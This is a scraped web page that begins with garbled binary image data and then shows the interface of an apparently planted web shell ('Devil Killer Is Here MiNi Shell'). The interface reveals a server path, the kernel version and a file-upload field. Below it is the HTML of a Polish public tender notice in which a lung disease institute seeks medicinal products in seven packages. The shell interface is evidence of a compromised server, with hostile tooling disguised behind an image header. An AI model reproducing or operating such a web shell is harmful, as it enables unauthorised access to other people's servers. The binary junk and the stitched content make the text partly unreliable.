JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20201015/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20201015/598028-N-2020.html

 <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 598028-N-2020 z dnia 2020-10-15 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Instytut Gruźlicy i Chorób Płuc</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dostawa produktów leczniczych i wyrobu medycznego określonych w 7 pakietach.</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Dostawy</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej – mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Instytut Gruźlicy i Chorób Płuc</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">000288490</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">ul. Płocka</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">26</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">01-138</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Warszawa</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">mazowieckie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">43 12 312, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">m.jaroszewska@igichp.edu.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">-</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.igichp.edu.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">Instytut badawczy.</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">https://www.igichp.edu.pl/zamowienia-publiczne/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">https://www.igichp.edu.pl/zamowienia-publiczne/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Osobiście, za pośrednictwem operatora publicznego, za pośrednictwem posłańca.</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Instytut Gruźlicy i Chorób Płuc, ul. Płocka 26, 01-138 Warszawa, budynek „E”, lok. Nr 24.</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dostawa produktów leczniczych i wyrobu medycznego określonych w 7 pakietach.</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">AP.26.59.2020</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Dostawy</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy">7</span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Przedmiotem zamówienia jest dostawa produktów leczniczych i wyrobu medycznego określonych w 7 pakietach:-Pakiet nr 1: Leki narkotyczne;-Pakiet nr 2: Leki psychotropowe;-Pakiet nr 3: Tabletki;-Pakiet nr 4: Ampułki;-Pakiet nr 5: Antybiotyki;-Pakiet nr 6: Galena;-Pakiet nr 7: Enoksaparyna;</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">33661200-3</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33660000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33610000-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33615000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33616000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33617000-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33620000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33621300-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33622300-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33651100-9</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33651200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33651400-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33670000-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33642200-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33631000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33631100-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33631400-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33631500-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33631600-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33632100-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33641100-6</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33661200-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33612000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>33621100-0</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach">3</span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Wykonawca musi być uprawniony do prowadzenia obrotu hurtowego produktami leczniczymi zgodnie z wymaganiami określonymi przepisami ustawy z dnia 6 września 2001 r. – Prawo farmaceutyczne (Dz. U. z 2019 r. poz. 499 z późn. zm.). </span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"></span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">W celu potwierdzenia braku podstawy, o której mowa w art. 24 ust. 1 pkt 23 ustawy PZP, wykluczenia wykonawcy z postępowania, wykonawca składa, stosownie do treści art. 24 ust. 11 ustawy PZP, w terminie 3 dni od zamieszczenia na stronie internetowej informacji z otwarcia ofert, tj. informacji, o których mowa w art. 86 ust. 5 ustawy PZP, oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej oraz w przypadku przynależności do tej samej grupy kapitałowej, dowody potwierdzające, że powiązania z innym wykonawcą/wykonawcami nie prowadzą do zakłócenia konkurencji w postępowaniu. </span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">W celu potwierdzenia spełnienia warunków udziału w postępowaniu, wykonawca, którego oferta zostanie najwyżej oceniona, na wezwanie zamawiającego jest zobowiązany złożyć w terminie 5 dni od dnia doręczenia wezwania zezwolenie na prowadzenie hurtowni farmaceutycznej wydane przez Głównego Inspektora Farmaceutycznego lub inny dokument uprawniający wykonawcę do dokonywania obrotu hurtowego produktami leczniczymi na terenie Polski. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania 